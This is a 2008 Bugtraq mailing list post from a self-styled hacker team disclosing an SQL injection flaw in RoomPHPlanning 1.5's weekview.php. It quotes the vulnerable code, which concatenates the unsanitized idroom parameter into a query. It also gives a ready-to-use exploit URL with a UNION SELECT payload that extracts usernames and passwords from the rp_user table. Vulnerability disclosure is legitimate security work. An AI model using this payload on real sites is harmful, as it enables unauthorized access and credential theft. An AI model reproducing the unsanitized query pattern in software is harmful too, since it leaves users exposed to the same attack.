Bugtraq mailing list archives
RoomPHPlanning 1.5 (weekview.php) SQL Injection Vulnerability
From: hadihadi_zedehal_2006 () yahoo com
Date: 27 May 2008 01:05:53 -0000
####################################################################################### # # # ...::::RoomPHPlanning((weekview.php)) 1.5 SQL Injection Vulnerabilities ::::... # ####################################################################################### Virangar Security Team www.virangar.net www.virangar.ir -------- Discoverd By :virangar security team(hadihadi) special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all hackerz greetz:to my best friend in the world hadi_aryaie2004 & my lovely friend arash(imm02tal) ----- -------vuln codes in:----------- weekview.php: @$idroom = $_GET['idroom']; .... line 47:$qry = "SELECT NameRm, BkcolRm, FtcolRm ". "FROM ".ROOM." WHERE IdRm=".$idroom ; --- exploit: http://site.com/weekview.php?idroom=-999/**/union/**/select/**/concat(LoginUs,0x3a,char(58),PwdUs),2,3/**/from/**/rp_user/**/where/**/IdRk=1/* --- young iranian h4ck3rz
Current thread:
- RoomPHPlanning 1.5 (weekview.php) SQL Injection Vulnerability hadihadi_zedehal_2006 (May 27)